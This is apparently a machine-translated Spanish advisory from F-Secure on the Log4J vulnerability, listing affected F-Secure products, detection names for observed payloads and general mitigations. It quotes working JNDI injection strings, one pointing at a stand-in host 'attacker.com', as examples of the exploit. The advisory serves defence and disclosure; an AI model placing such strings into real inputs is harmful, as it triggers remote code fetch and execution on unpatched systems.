Una vulnerabilidad en la biblioteca Log4J, descubierta el viernes 10 de diciembre, está sacudiendo a los fabricantes de software y proveedores de servicios de todo el mundo. La vulnerabilidad en el método estandarizado para procesar mensajes de registro en software de Minecraft de Microsoft para plataformas de comercio electrónico ya está siendo atacada por atacantes.
Es casi imposible describir el nivel de riesgo que presentan actualmente las aplicaciones vulnerables. Si se registra una cadena de caracteres controlada por el usuario dirigida a la vulnerabilidad, la vulnerabilidad se puede ejecutar de forma remota. En pocas palabras, un atacante podría usar esta vulnerabilidad para engañar al sistema de destino para que obtenga y ejecute el código de forma remota. En el segundo paso, depende del atacante qué debe hacer el código malicioso.
Una “tormenta casi perfecta”
Esta vulnerabilidad muestra lo difícil que es asegurar el software corporativo en múltiples niveles. El software obsoleto, incluidas las versiones anteriores de Java, obliga a muchas empresas a desarrollar sus propios parches oa impedir que los parchen inmediatamente. Otra complicación surge del desafío de parchear las capacidades de registro de Log4j en tiempo real, justo cuando la amenaza de ataques es tan alta y el registro es tan importante.
Todas las contramedidas recomendadas deben implementarse "inmediatamente", escribe la Agencia de Seguridad de Infraestructura y Ciberseguridad en una publicación de blog.
Los usuarios individuales no pueden hacer mucho más que instalar actualizaciones para varios servicios en línea a medida que estén disponibles. Y eso debería suceder de inmediato. Las firmas y empresas trabajarán sin descanso para implementar parches mientras protegen sus propios sistemas. Después de eso, será importante determinar si hay un incidente de seguridad activo en curso en los sistemas afectados.
Vulnerabilidades en casi todas partes
Puede ser más difícil encontrar una aplicación que no utilice la biblioteca Log4J que una que sí lo haga. Esta ubicuidad significa que los atacantes pueden buscar vulnerabilidades en casi cualquier lugar.
“Por favor cambie el nombre de su Tesla o iPhone NO en ${jndi:ldap://url/a} a menos que desee un evento inesperado”, dice Erka Koivunen, directora de seguridad de la información de F-Secure, en broma.
El uso del lenguaje de formato de Log4J podría desencadenar malware en aplicaciones vulnerables. Como sabemos, la sola mención de una frase como ${jndi:ldap://attacker.com/pwnyourserver} en un chat de Minecraft, por ejemplo, puede desencadenar una tormenta de seguridad en Microsoft en un sistema sin parches.
¿Se ven afectados los productos de F-Secure?
F-Secure ha determinado que los siguientes productos se ven afectados por esta vulnerabilidad:
- Administrador de políticas de F-Secure
- Proxy del administrador de políticas de F-Secure
- Proxy de punto final de F-Secure
- Conector de elementos F-Secure
Tanto las versiones de Windows como las de Linux de estos productos se ven afectadas y deben parchearse de inmediato.
¿Cómo puedo parchear mi producto F-Secure?
Hemos desarrollado un parche de seguridad para esta vulnerabilidad. Las noticias y actualizaciones sobre esta vulnerabilidad se publican continuamente en nuestra página de la comunidad.
¿Qué protección ofrece F-Secure contra esta vulnerabilidad?
F-Secure Endpoint Protection (EPP) se actualiza constantemente con detecciones de los últimos archivos de exploits locales, pero dadas las muchas formas en que se puede explotar una vulnerabilidad, esto solo cubre una parte del problema.
Las detecciones de EPP, como de costumbre, se ocupan de cualquier carga útil vista en la fase posterior a la explotación. Al momento de escribir este artículo, F-Secure ha realizado las siguientes detecciones que cubren algunos escenarios de ataques graves. Estas son cargas útiles maliciosas que hemos observado en relación con las vulnerabilidades de Log4j.
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agente.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
Muchas de estas detecciones han estado disponibles en F-Secure EPP durante meses, lo que significa que los clientes están protegidos de manera proactiva contra estas cargas útiles.
Otras detecciones existentes también pueden ser útiles, ya que existen múltiples formas de aprovechar el exploit. Esta lista de detecciones útiles se actualizará continuamente a medida que evolucione la situación. Consulte las recomendaciones generales en la siguiente sección para conocer las acciones correctivas adicionales.
En general, ¿qué acciones debe tomar con cualquier software, independientemente del fabricante?
- Restrinja el acceso a la red o limítelo a sitios confiables. Si su sistema no puede conectarse a Internet para obtener el código malicioso, el ataque fallará.
- Consulte periódicamente con los proveedores para obtener información sobre parches y otras correcciones para vulnerabilidades de seguridad.
- F-Secure Elements Vulnerability Management puede ayudar a identificar sistemas vulnerables.
- Los productos F-Secure Elements Endpoint Protection o F-Secure Business Suite pueden detectar y parchear el software vulnerable en el sistema donde están instalados.
F-Secure también mantiene actualizados a todos los clientes y usuarios en todo momento.
Más en F-Secure.com
Acerca de F-Secure Nadie conoce mejor los ciberataques reales que F-Secure. Cerramos la brecha entre la detección y la respuesta. Para hacer esto, aprovechamos la inigualable experiencia en amenazas de cientos de los principales consultores técnicos de nuestra industria, los datos de millones de dispositivos que ejecutan nuestro galardonado software y las innovaciones continuas en inteligencia artificial. Los principales bancos, aerolíneas y corporaciones confían en nuestro compromiso de luchar contra las ciberamenazas más peligrosas del mundo. Junto con nuestra red de socios de canal principales y más de 200 proveedores de servicios, nuestra misión es brindar a todos nuestros clientes seguridad cibernética de nivel empresarial adaptada a sus necesidades. Fundada en 1988, F-Secure cotiza en NASDAQ OMX Helsinki Ltd.